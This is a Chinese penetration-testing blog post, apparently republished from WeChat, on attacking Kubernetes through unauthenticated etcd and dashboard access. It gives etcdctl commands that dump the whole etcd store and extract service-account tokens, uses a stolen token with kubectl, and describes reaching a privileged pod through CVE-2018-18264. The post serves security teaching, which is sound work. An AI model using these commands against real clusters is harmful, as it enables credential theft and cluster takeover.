【云原生渗透】- k8s的攻击利用面(二)

admin 2022年3月18日00:11:42评论275 views字数 1583阅读5分16秒阅读模式

接上文:https://mp.weixin.qq.com/s/ukm64QJ1yytKNpwRBeP6sg

3. etcd未授权访问

etcd默认监听了2379等端口,如果2379端口暴露到公网,可能造成敏感信息泄露。etcd若存在未授权,攻击者导出全量etcd配置,获取k8s认证证书等关键配置,进而通过kubectl创建恶意pod或控制已有pod,后续可尝试逃逸至宿主机。

访问https://IP:2379/v2/keys,有内容,类似{“action”:“get”,“node”:{“dir”:true}} 这样的,就确定存在未授权访问。

【云原生渗透】- k8s的攻击利用面(二)

https://github.com/etcd-io/etcd/releases/ 下载 得到etcdctl

通过如下命令可以遍历所有的key:

  1. export ETCDCTL_API=3

    ./etcdctl --endpoints=http://IP:2379/ get / --prefix --keys-only

    # 服务器启用了https

    ./etcdctl --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://IP:2379/ get / --prefix --keys-only

下面的命令,通过v3 API来dump数据库到 output.data:

  1. ETCDCTL_API=3
    ./etcdctl --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://IP:2379/ get / --prefix --keys-only | sort | uniq | xargs -I{} sh -c 'ETCDCTL_API=3 ./etcdctl --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://IP:2379 get {} >> output.data && echo "" >> output.data'

    # 比如获取具体的token

    etcdctl.exe --endpoints="10.10.10.10:2379" get /register/secrets/kube-system/clusterrole-xxx-xxx-token-o4dk9

【云原生渗透】- k8s的攻击利用面(二)

拿到token后跟之前一样创建test_config控制集群,也可以直接使用token:

  1. ./kubectl --insecure-skip-tls-verify -s https://10.10.10.10:6443 get pods --token="eyJhbGxxxxx"

4. dashboard未授权访问(CVE-2018-18264)

k8s dashboard的enable-skip-login开启时,登录页面可选择跳过登录:

【云原生渗透】- k8s的攻击利用面(二)

登录后,可通过dashboard获取pod、node和job等状态。

在安装dashboard的时候,会默认建立dashboard-admin账号并且分配cluster-admin的角色:

【云原生渗透】- k8s的攻击利用面(二)

因此在kube-system中找到关键字admin的账号token就能登录dashboard后台:

【云原生渗透】- k8s的攻击利用面(二)

若业务配置错误或为了方便给 Kubernetes dashboard 绑定 cluster-admin等角色,攻击者可直接在界面上创建特权 pod 进行容器逃逸。

参考链接

https://mp.weixin.qq.com/s/T2QGLlKwjaUByDtGFL94PQ

https://blog.csdn.net/w1590191166/article/details/122028001?spm=1001.2014.3001.5501


原文始发于微信公众号(信安文摘):【云原生渗透】- k8s的攻击利用面(二)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月18日00:11:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【云原生渗透】- k8s的攻击利用面(二)http://cn-sec.com/archives/832833.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息